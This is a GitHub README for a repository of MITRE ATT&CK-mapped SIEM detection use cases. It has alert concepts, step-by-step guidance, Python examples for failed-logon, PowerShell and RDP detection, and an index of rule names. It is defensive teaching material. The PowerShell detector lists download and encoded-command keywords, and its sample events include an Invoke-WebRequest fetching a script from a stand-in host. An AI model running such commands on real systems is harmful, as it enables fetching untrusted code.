https://github.com/rajeevranjancom/mitre-based-usecases

# Mitre-Based-Usecases
This repository is established as part of my personal projects and cybersecurity research endeavors.

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/02e1219d-08b8-4c03-a4b6-77ec011078fa)

# Working of use-cases:

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/dee8e7b8-5aeb-4c02-b2b9-3e0973a8e7bb)

Alerts in cybersecurity serve as notifications or warnings about potential security incidents or vulnerabilities within a network or system. They play a critical role in helping security teams quickly identify, investigate, and respond to threats, thus maintaining the integrity, confidentiality, and availability of information.

### Use Cases of Alerts in Cybersecurity:

1. **Intrusion Detection:**
- **Use Case:** Alerts notify security teams of unauthorized access attempts or suspicious activities.
- **Example:** An alert triggers when an unknown IP address attempts multiple failed logins on a server.

2. **Malware Detection:**
- **Use Case:** Alerts indicate the presence of malicious software such as viruses, ransomware, or spyware.
- **Example:** An alert is generated when a file matching the signature of known malware is downloaded or executed.

3. **Phishing Attacks:**
- **Use Case:** Alerts inform users and administrators about potential phishing emails or websites.
- **Example:** An alert is sent when an email with suspicious links or attachments is detected.

4. **Data Exfiltration:**
- **Use Case:** Alerts detect unusual data transfer activities that may indicate data theft.
- **Example:** An alert occurs when a large amount of sensitive data is transferred outside the network during off-hours.

5. **Vulnerability Management:**
- **Use Case:** Alerts notify about newly discovered vulnerabilities and necessary patches.
- **Example:** An alert is issued when a critical security patch is available for a widely-used software application.

6. **Configuration Changes:**
- **Use Case:** Alerts detect unauthorized or unexpected changes in system configurations.
- **Example:** An alert triggers when firewall rules are altered without proper authorization.

7. **Behavioral Anomalies:**
- **Use Case:** Alerts identify deviations from normal user or system behavior that could indicate a compromise.
- **Example:** An alert is generated when a user accesses resources they typically do not access.

8. **Compliance Monitoring:**
- **Use Case:** Alerts help ensure that systems comply with regulatory and policy requirements.
- **Example:** An alert notifies when a system configuration deviates from compliance standards like GDPR or HIPAA.

### Working of Alerts in Cybersecurity:

1. **Data Collection:**
- **Sources:** Security Information and Event Management (SIEM) systems, Intrusion Detection Systems (IDS), firewalls, antivirus software, and other security tools collect data from various network components and endpoints.
- **Logs and Events:** These systems gather logs, events, and network traffic data.

2. **Analysis:**
- **Correlation:** The collected data is analyzed and correlated to identify patterns or signatures associated with known threats.
- **Behavioral Analysis:** Machine learning and AI algorithms are used to detect anomalies and unusual behaviors that deviate from the baseline.

3. **Detection:**
- **Rule-based Detection:** Predefined rules and signatures trigger alerts when certain conditions are met (e.g., multiple failed login attempts).
- **Anomaly Detection:** Advanced systems use statistical models and machine learning to identify deviations from normal behavior, which can indicate new or unknown threats.

4. **Alert Generation:**
- **Severity Levels:** Alerts are categorized based on severity (e.g., informational, warning, critical) to prioritize response.
- **Notification:** Alerts are sent to security teams via dashboards, emails, SMS, or integration with other incident response tools.

5. **Response:**
- **Investigation:** Security analysts investigate the alerts to determine the validity and scope of the potential threat.
- **Mitigation:** If a threat is confirmed, appropriate actions are taken to mitigate the risk, such as isolating affected systems, applying patches, or blocking malicious IP addresses.
- **Reporting:** Incidents are documented, and reports are generated for compliance and further analysis.

6. **Feedback and Improvement:**
- **Tuning:** Based on the investigation outcomes, rules and detection mechanisms are refined to reduce false positives and improve detection accuracy.
- **Learning:** Continuous learning from past incidents helps in enhancing the overall security posture and readiness against future threats.

By using alerts effectively, organizations can proactively manage and mitigate risks, ensuring a robust defense against cyber threats.
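The collection, detection, severity, notification and tuning steps above, carried through as an added Python example (this is illustrative code written for this page, not part of the repository's own rules). The rule is the README's own "multiple failed login attempts" example: a burst of Windows Security Event ID 4625 (failed logon) from one source IP, escalated to critical when a 4624 (successful logon) from the same IP follows, and suppressed for sources an analyst has confirmed benign. The events, the 5-in-60-seconds threshold, the 5-minute follow-up window and the notification routes are constructed assumptions for the example; only the event IDs are real Windows values.

```python
"""Alert pipeline for one rule-based detection: collect -> detect -> severity -> route -> tune."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security events (not from a real system):
# 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T02:00:00", "event_id": 4625, "src_ip": "203.0.113.7", "user": "admin"},
    {"ts": "2024-05-01T02:00:05", "event_id": 4625, "src_ip": "203.0.113.7", "user": "admin"},
    {"ts": "2024-05-01T02:00:09", "event_id": 4625, "src_ip": "203.0.113.7", "user": "backup"},
    {"ts": "2024-05-01T02:00:14", "event_id": 4625, "src_ip": "203.0.113.7", "user": "svc_sql"},
    {"ts": "2024-05-01T02:00:20", "event_id": 4625, "src_ip": "203.0.113.7", "user": "svc_sql"},
    {"ts": "2024-05-01T02:00:31", "event_id": 4624, "src_ip": "203.0.113.7", "user": "svc_sql"},
    # the internal vulnerability scanner trips the same threshold every night (false positive)
    *[{"ts": f"2024-05-01T03:00:{s:02d}", "event_id": 4625, "src_ip": "10.0.0.9", "user": "scanner"}
      for s in (0, 3, 6, 9, 12)],
    {"ts": "2024-05-01T09:15:00", "event_id": 4625, "src_ip": "10.0.0.50", "user": "jdoe"},
    {"ts": "2024-05-01T09:15:03", "event_id": 4624, "src_ip": "10.0.0.50", "user": "jdoe"},
]

FAIL_THRESHOLD = 5                       # assumed: failures needed inside WINDOW to alert
WINDOW = timedelta(seconds=60)
SUCCESS_FOLLOWUP = timedelta(minutes=5)  # a success this soon after the burst escalates severity
ROUTES = {"critical": ("pager", "email"), "warning": ("dashboard",)}   # notification step


def detect_failed_logon_bursts(events, allowlist=frozenset()):
    """Rule: at least FAIL_THRESHOLD 4625 events from one source IP inside WINDOW.
    Severity becomes critical when a 4624 from the same IP follows the burst, because that
    pattern looks like a successful guess rather than a noisy client."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):      # ISO timestamps sort as strings
        by_ip[e["src_ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        if ip in allowlist:          # tuning: sources confirmed benign by analysts are skipped
            continue
        fails = [datetime.fromisoformat(e["ts"]) for e in evs if e["event_id"] == 4625]
        wins = [datetime.fromisoformat(e["ts"]) for e in evs if e["event_id"] == 4624]
        start = 0
        for end in range(len(fails)):                     # sliding window over failure times
            while fails[end] - fails[start] > WINDOW:
                start += 1
            if end - start + 1 < FAIL_THRESHOLD:
                continue
            followed = any(fails[end] < w <= fails[end] + SUCCESS_FOLLOWUP for w in wins)
            severity = "critical" if followed else "warning"
            alerts.append({
                "rule": "failed-logon burst", "src_ip": ip, "severity": severity,
                "users": sorted({e["user"] for e in evs if e["event_id"] == 4625}),
                "window_start": fails[start].isoformat(), "window_end": fails[end].isoformat(),
                "notify": ROUTES[severity],
            })
            break                                         # one alert per source per run (dedup)
    return alerts


if __name__ == "__main__":
    for a in detect_failed_logon_bursts(SAMPLE_EVENTS):
        print(a["severity"], a["src_ip"], a["users"], "->", a["notify"])
    # feedback step: once an analyst confirms 10.0.0.9 is the scanner, allowlist it
    print(len(detect_failed_logon_bursts(SAMPLE_EVENTS, allowlist={"10.0.0.9"})), "alert(s) after tuning")
```

Run as written it raises two alerts (the external burst followed by a success as critical, the scanner as warning); passing the scanner's address in `allowlist` is the tuning loop from the feedback step and leaves only the critical alert.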

Creating use case alerts based on the MITRE ATT&CK framework involves defining and implementing specific alerts that map to tactics, techniques, and procedures (TTPs) identified in the MITRE ATT&CK matrix. These use cases help in detecting potential threats by recognizing behaviors and activities associated with known adversarial tactics. Here's a step-by-step guide to creating MITRE-based use case alerts:

## MITRE MAPPING

## Step 1: Understand the MITRE ATT&CK Framework
The MITRE ATT&CK framework is a comprehensive matrix of tactics and techniques used by adversaries. It is divided into:

- **Tactics:** The "why" of an attack (e.g., Initial Access, Execution, Persistence).
- **Techniques:** The "how" of an attack (e.g., Phishing, PowerShell, Scheduled Task).

## Step 2: Identify Relevant TTPs
Based on your organization's threat model and environment, identify which TTPs are most relevant. For example, if your organization uses Windows, you might focus on techniques frequently used against Windows systems.

## Step 3: Gather Logs and Data Sources
Ensure that you have access to necessary logs and data sources such as:

- Endpoint detection and response (EDR) logs
- Network traffic logs
- Authentication logs
- Application logs

## Step 4: Define Use Cases
Translate the identified TTPs into specific use cases. Each use case should describe the following:

- **Objective:** What you aim to detect.
- **Tactic and Technique:** Corresponding MITRE ATT&CK tactic and technique.
- **Data Sources:** Logs and data required.
- **Detection Logic:** How to identify the suspicious activity.

## Step 5: Implement Detection Logic
Create the actual detection rules using your SIEM or EDR tool. The detection logic can vary based on the platform, but generally involves:

- **Indicators of Compromise (IoCs):** Specific artifacts like file hashes or IP addresses.
- **Behavioral Indicators:** Patterns of behavior such as unusual login times, execution of certain scripts, etc.

## Step 6: Test and Tune
Before deploying the use cases into production, test them thoroughly to ensure they work as expected and do not generate false positives. Fine-tune the logic as necessary.

## Step 7: Deploy and Monitor
Deploy the alerts in your production environment and continuously monitor their effectiveness. Update the use cases as new TTPs emerge or as your environment changes.

## Example Use Case: Detecting PowerShell Execution (T1059.001)

- **Objective:** Detect malicious PowerShell execution.
- **Tactic:** Execution
- **Technique:** PowerShell (T1059.001)
- **Data Sources:**
  - Windows Event Logs (Event ID 4104 for PowerShell Script Block Logging)
  - EDR logs

## Detection Logic:

Look for suspicious PowerShell commands that are commonly used by attackers, such as those that:

- Encode scripts (powershell.exe -EncodedCommand)
- Download content from the internet (e.g., Invoke-WebRequest, wget)
- Access WMI objects

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/327f6c9c-8d05-4ebc-a8c5-312eb1c1af97)

## Example Use Case: Detecting Unusual RDP Activity (T1076)

- **Objective:** Detect unusual Remote Desktop Protocol (RDP) activity that might indicate lateral movement or unauthorized access.
- **Tactic:** Lateral Movement
- **Technique:** Remote Desktop Protocol (T1076)
- **Data Sources:**
  - Windows Security Event Logs (Event ID 4624 for logon events)
  - Network traffic logs
  - RDP session logs

## Detection Logic:

- Identify RDP sessions initiated from unusual IP addresses.
- Detect multiple RDP login attempts from a single IP in a short time frame.
- Alert on RDP logins outside of normal business hours.
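Steps 4 to 6 above and both example use cases (PowerShell, T1059.001, and RDP, numbered T1076 in this README), carried through as one added Python example. This is illustrative code written for this page, not the repository's own rules or the SIEM content shown in the screenshots. Each use case is recorded with the Step 4 fields (objective, tactic, technique, data sources) plus its detection logic as a function, and a runner evaluates them over one batch of events. Assumptions: the event dictionaries are constructed; the known-source baseline (10.0.0.10), the 3-attempts-in-10-minutes threshold and the 08:00 to 18:00 weekday window are made-up tuning values; Event IDs 4104, 4624 and 4625 and logon type 10 (RemoteInteractive, i.e. RDP) are real Windows values.

```python
"""MITRE ATT&CK-mapped use cases (Step 4) with detection logic (Step 5), run over constructed events."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Callable


@dataclass
class UseCase:
    """Fields the README asks for in Step 4; `detect` is the detection logic itself."""
    name: str
    objective: str
    tactic: str
    technique: str                    # ATT&CK ID exactly as numbered in this README
    data_sources: tuple
    detect: Callable[[list], list]    # events -> alerts


# Use case 1: PowerShell (T1059.001) over Event ID 4104 script block text.
# Indicator groups follow the README's detection logic; matching is case-insensitive.
SUSPICIOUS_POWERSHELL = {
    "encoded command": ("-encodedcommand", "-enc "),
    "download from internet": ("invoke-webrequest", "wget ", "downloadstring"),
    "wmi access": ("get-wmiobject", "get-ciminstance", "win32_"),
}


def detect_powershell(events):
    alerts = []
    for e in events:
        if e.get("event_id") != 4104:
            continue
        text = e["script_block"].lower()
        hits = [label for label, needles in SUSPICIOUS_POWERSHELL.items()
                if any(n in text for n in needles)]
        if hits:   # more than one indicator group in a single script block is escalated
            alerts.append({"technique": "T1059.001", "host": e["host"], "user": e["user"],
                           "indicators": hits, "severity": "critical" if len(hits) > 1 else "warning"})
    return alerts


# Use case 2: unusual RDP activity (T1076 in this README) over 4624/4625 with logon type 10
# (RemoteInteractive). The baseline and thresholds below are constructed for the example.
KNOWN_RDP_SOURCES = frozenset({"10.0.0.10"})   # assumed: the only host expected to open RDP sessions
BUSINESS_HOURS = range(8, 18)                    # 08:00-17:59, Monday to Friday
BURST_WINDOW, BURST_THRESHOLD = timedelta(minutes=10), 3


def detect_rdp(events, known_sources=KNOWN_RDP_SOURCES):
    rdp = sorted((e for e in events if e.get("logon_type") == 10
                  and e.get("event_id") in (4624, 4625)), key=lambda e: e["ts"])
    attempts, alerts = defaultdict(list), []
    for e in rdp:
        ts, ip = datetime.fromisoformat(e["ts"]), e["src_ip"]
        attempts[ip].append(ts)
        reasons = []
        # Rule 2: several attempts (failed or successful) from one IP inside the window
        if sum(1 for t in attempts[ip] if ts - t <= BURST_WINDOW) >= BURST_THRESHOLD:
            reasons.append("multiple RDP logon attempts in 10 min")
        if e["event_id"] == 4624:       # rules 1 and 3 apply to established sessions
            if ip not in known_sources:
                reasons.append("unusual source IP")
            if ts.weekday() >= 5 or ts.hour not in BUSINESS_HOURS:
                reasons.append("outside business hours")
        if reasons:
            alerts.append({"technique": "T1076", "src_ip": ip, "user": e["user"], "reasons": reasons,
                           "severity": "critical" if len(reasons) > 1 else "warning"})
    return alerts


USE_CASES = [
    UseCase("Suspicious PowerShell execution", "Detect malicious PowerShell execution", "Execution",
            "T1059.001", ("Windows Event ID 4104", "EDR logs"), detect_powershell),
    UseCase("Unusual RDP activity", "Detect RDP activity indicating lateral movement",
            "Lateral Movement", "T1076", ("Windows Event ID 4624", "RDP session logs"), detect_rdp),
]


def run_use_cases(events, use_cases=USE_CASES):
    """Step 5/6: evaluate every use case over one batch of events, keyed by technique ID."""
    return {uc.technique: uc.detect(events) for uc in use_cases}


# Constructed sample events (not from a real host); 2024-05-06 is a Monday.
SAMPLE_EVENTS = [
    {"event_id": 4104, "ts": "2024-05-06T10:05:00", "host": "WS01", "user": "alice",
     "script_block": "powershell.exe -EncodedCommand QQBBAEEAQQA="},           # placeholder base64
    {"event_id": 4104, "ts": "2024-05-06T10:06:00", "host": "WS02", "user": "bob",
     "script_block": "Invoke-WebRequest -Uri http://example.invalid/u.ps1 -OutFile u.ps1; "
                     "Get-WmiObject Win32_Process"},
    {"event_id": 4104, "ts": "2024-05-06T10:07:00", "host": "WS03", "user": "carol",
     "script_block": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"event_id": 4624, "logon_type": 10, "ts": "2024-05-06T10:00:00", "src_ip": "10.0.0.10", "user": "alice"},
    {"event_id": 4625, "logon_type": 10, "ts": "2024-05-06T23:20:00", "src_ip": "198.51.100.23", "user": "admin"},
    {"event_id": 4625, "logon_type": 10, "ts": "2024-05-06T23:22:00", "src_ip": "198.51.100.23", "user": "admin"},
    {"event_id": 4624, "logon_type": 10, "ts": "2024-05-06T23:30:00", "src_ip": "198.51.100.23", "user": "admin"},
]

if __name__ == "__main__":
    for technique, found in run_use_cases(SAMPLE_EVENTS).items():
        print(technique, found)
```

The benign script block and the daytime session from the jump host produce nothing, which is the Step 6 check that a use case stays quiet on known-good activity; the RDP alert carries all three reasons from the detection logic because the late-night session from an unknown address is also the third attempt inside ten minutes. Extending `known_sources` after an analyst confirms a new jump host is the tuning path from Step 6.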

## Example SIEM Rule:

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/e24e69c5-bf95-4116-99db-c75ba68c02eb)

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/db4a1871-56ef-40e4-9dde-89efc4f78e83)

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/605ed5d3-9816-420f-bcf8-b7bea9a17bf5)

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/5c316462-11c0-42e9-af4b-a889f990a325)

![image](https://github.com/rajeevranjancom/Mitre-Based-Usecases/assets/50344183/da3030fb-7ed4-4104-826c-32f644ab0736)

# Index

| Rule Name | Associated Project |
|-----------------------------------------------|----------------------------|
| AADInternals PowerShell Cmdlet Execution | AADInternals PowerShell Cmdlet Execution |
| AD Object WriteDAC Access Detected | AD Object WriteDAC Access Detected |
| AD Privileged Users or Groups Reconnaissance Detected | AD Privileged Users or Groups Reconnaissance Detected|
| Accessibility Features-Registry | Accessibility Features-Registry|
| Accessibility features - Process | Accessibility features - Process |
| Account Discovery Detected | Account Discovery Detected|
| Active Directory DLLs Loaded By Office Applications | Active Directory DLLs Loaded By Office Applications|
| Active Directory Replication User Backdoor | Active Directory Replication User Backdoor|
| Active Directory Schema Change Detected | Active Directory Schema Change Detected|
| Activity Related to NTDS Domain Hash Retrieval | Activity Related to NTDS Domain Hash Retrieval|
| Addition of SID History to Active Directory Object | Addition of SID History to Active Directory Object|
| Adobe Flash Use-After-Free Vulnerability Detected | Adobe Flash Use-After-Free Vulnerability Detected|
| Adwind RAT JRAT Detected | Adwind RAT JRAT Detected |
| Antivirus Exploitation Framework Detection | Antivirus Exploitation Framework Detection|
| Antivirus Password Dumper Detected | Antivirus Password Dumper Detected|
| Antivirus Web Shell Detected | Antivirus Web Shell Detected|
| Apache Struts 2 Remote Code Execution Detected | Apache Struts 2 Remote Code Execution Detected|
| AppCert DLLs Detected | AppCert DLLs Detected|
| Application Shimming - File Access Detected | Application Shimming - File Access Detected|
| Application Whitelisting Bypass via Bginfo Detected | Application Whitelisting Bypass via Bginfo Detected|
| Application Whitelisting Bypass via DLL Loaded by odbcconf Detected | Application Whitelisting Bypass via DLL Loaded by odbcconf Detected |
| Application Whitelisting Bypass via Dnx Detected | Application Whitelisting Bypass via Dnx Detected|
| Application Whitelisting Bypass via Dxcap Detected | Application Whitelisting Bypass via Dxcap Detected|
| Audio Capture Detected | Audio Capture Detected |
| Authentication Package Detected | Authentication Package Detected|
| Autorun Keys Modification Detected | Autorun Keys Modification Detected|
| BITS Jobs - Network Detected | BITS Jobs - Network Detected|
| BITS Jobs - Process Detected | BITS Jobs - Process Detected|
| Batch Scripting Detected| Batch Scripting Detected|
| SIEM Implementation and Log Analysis | Detection Lab|
| Bloodhound and Sharphound Hack Tool Detected | Bloodhound and Sharphound Hack Tool Detected|
| BlueMashroom DLL Load Detected | BlueMashroom DLL Load Detected|
| Browser Bookmark Discovery | Browser Bookmark Discovery|
| Bypass UAC via CMSTP Detected | Bypass UAC via CMSTP Detected |
| Bypass User Account Control using Registry | Bypass User Account Control using Registry |
| C-Sharp Code Compilation Using Ilasm Detected | C-Sharp Code Compilation Using Ilasm Detected|
| CACTUSTORCH Remote Thread Creation Detected | CACTUSTORCH Remote Thread Creation Detected|
| CEO Fraud - Possible Fraudulent Email Behavior | CEO Fraud - Possible Fraudulent Email Behavior|
| CMSTP Detected | CMSTP Detected |
| CMSTP Execution Detected | CMSTP Execution Detected|
| CMSTP UAC Bypass via COM Object Access | CMSTP UAC Bypass via COM Object Access|
| CVE-2019-0708 RDP RCE Vulnerability Detected | CVE-2019-0708 RDP RCE Vulnerability Detected|
| Capture a Network Trace with netsh | Capture a Network Trace with netsh|
| Certutil Encode Detected | Certutil Encode Detected|
| Chafer Activity Detected | Chafer Activity Detected|
| Change of Default File Association Detected | Change of Default File Association Detected|
| Citrix ADC VPN Directory Traversal Detected | Citrix ADC VPN Directory Traversal Detected|
| Clearing of PowerShell Logs Detected | Clearing of PowerShell Logs Detected |
| Clipboard Data Access Detected | Clipboard Data Access Detected |
| Clop Ransomware Emails Sent to Attacker | Clop Ransomware Emails Sent to Attacker |
| Incident Response Planning and Execution | Incident Response Planning and Execution |
| Clop Ransomware Infected Host Detected | Clop Ransomware Infected Host Detected|
| Scripting and Automation for Threat Mitigation | Scripting and Automation for Threat Mitigation|
| Cmdkey Cached Credentials Recon Detected | Cmdkey Cached Credentials Recon Detected|
| CobaltStrike Process Injection Detected | CobaltStrike Process Injection Detected|
| Command Obfuscation in Command Prompt| Command Obfuscation in Command Prompt|
| Command Obfuscation via Character Insertion | Command Obfuscation via Character Insertion|
| Command Obfuscation via Environment Variable Concatenation Reassembly | Command Obfuscation via Environment Variable Concatenation Reassembly|
| Compiled HTML File Detected | Compiled HTML File Detected|
| Component Object Model Hijacking Detected | Component Object Model Hijacking Detected|
| Connection to Hidden Cobra Source | Connection to Hidden Cobra Source|
| Console History Discovery Detected | Console History Discovery Detected|
| Control Panel Items - Process Detected | Control Panel Items - Process Detected|
| Control Panel Items - Registry Detected | Control Panel Items - Registry Detected|
| Control Panel Items Detected | Control Panel Items Detected|
| Copy from Admin Share Detected | Copy from Admin Share Detected|
| Copying Sensitive Files with Credential Data | Copying Sensitive Files with Credential Data |
| Copyright Violation Email | Copyright Violation Email|
| CrackMapExecWin Detected | CrackMapExecWin Detected|
| CreateMiniDump Hacktool Detected | CreateMiniDump Hacktool Detected|
| CreateRemoteThread API and LoadLibrary | CreateRemoteThread API and LoadLibrary|
| Credential Access via Input Prompt Detected | Credential Access via Input Prompt Detected |
| Credential Dump Tools Dropped Files Detected | Credential Dump Tools Dropped Files Detected |
| Credential Dumping - Process Access | Credential Dumping - Process Access |
| Credential Dumping - Process Creation | Credential Dumping - Process Creation |
| Credential Dumping - Registry Save | Credential Dumping - Registry Save |
| Credential Dumping with ImageLoad Detected | Credential Dumping with ImageLoad Detected |
| Credentials Access in Files Detected | Credentials Access in Files Detected |
| Credentials Capture via Rpcping Detected | Credentials Capture via Rpcping Detected|
| Credentials in Registry Detected | Credentials in Registry Detected |
| Curl Start Combination Detected | Curl Start Combination Detected |
| DCSync detected | DCSync detected |
| DLL Side Loading Via Microsoft Defender | DLL Side Loading Via Microsoft Defender|
| Data Compression Detected in Windows | Data Compression Detected in Windows|
| DenyAllWAF SQL Injection Attack | DenyAllWAF SQL Injection Attack|
| Execution of Trojanized 3CX Application | Execution of Trojanized 3CX Application|
| Javascript conversion to executable Detected | Javascript conversion to executable Detected|
| LSASS Process Access by Mimikatz | LSASS Process Access by Mimikatz|
| Malicious use of Scriptrunner Detected| Malicious use of Scriptrunner Detected|
| Microsoft SharePoint Remote Code Execution Detected | Microsoft SharePoint Remote Code Execution Detected|
| Mitre - Initial Access - Valid Account - Unauthorized IP Access | Mitre - Initial Access - Valid Account - Unauthorized IP Access|
| Msbuild Spawned by Unusual Parent Process | Msbuild Spawned by Unusual Parent Process|
| Process Dump via Resource Leak Diagnostic Tool| Process Dump via Resource Leak Diagnostic Tool|
| Proxy Execution via Desktop Setting Control Panel | Proxy Execution via Desktop Setting Control Panel|
| Regsvr32 Anomalous Activity Detected | Regsvr32 Anomalous Activity Detected|
| Remote File Execution via MSIEXEC | Remote File Execution via MSIEXEC|
| ScreenSaver Registry Key Set Detected | ScreenSaver Registry Key Set Detected|
| Suspicious ConfigSecurityPolicy Execution Detected | Suspicious ConfigSecurityPolicy Execution Detected|
| Suspicious DLL execution via Register-Cimprovider | Suspicious DLL execution via Register-Cimprovider|
| Suspicious Driver Loaded | Suspicious Driver Loaded|
| Suspicious Execution of Gpscript Detected| Suspicious Execution of Gpscript Detected|
| Suspicious File Execution via MSHTA | Suspicious File Execution via MSHTA|
| Suspicious Files Designated as System Files Detected | Suspicious Files Designated as System Files Detected |
| Suspicious Microsoft Equation Editor Child Process | Suspicious Microsoft Equation Editor Child Process|
| Suspicious Named Pipe Connection to Azure AD Connect Database | Suspicious Named Pipe Connection to Azure AD Connect Database|
| Suspicious Scheduled Task Creation via Masqueraded XML File | Suspicious Scheduled Task Creation via Masqueraded XML File|
| Suspicious WMIC XSL Script Execution | Suspicious WMIC XSL Script Execution|
| Suspicious process related to Rundll32 Detected | Suspicious process related to Rundll32 Detected|
| UAC Bypass Attempt via Windows Directory Masquerading | UAC Bypass Attempt via Windows Directory Masquerading |
| UAC Bypass via Sdclt Detected | UAC Bypass via Sdclt Detected |
| Unsigned Image Loaded Into LSASS Process | Unsigned Image Loaded Into LSASS Process|
| Usage of Sysinternals Tools Detected | Usage of Sysinternals Tools Detected |
| Windows Command Line Execution with Suspicious URL and AppData Strings| Windows Command Line Execution with Suspicious URL and AppData Strings|
| Windows CryptoAPI Spoofing Vulnerability Detected | Windows CryptoAPI Spoofing Vulnerability Detected|
| Windows Error Process Masquerading| Windows Error Process Masquerading|
| Xwizard DLL Side Loading Detected| Xwizard DLL Side Loading Detected|
| ZIP File Creation or Extraction via Printer Migration CLI Tool | ZIP File Creation or Extraction via Printer Migration CLI Tool|
| Data Staging Process Detected in Windows | Data Staging Process Detected in Windows|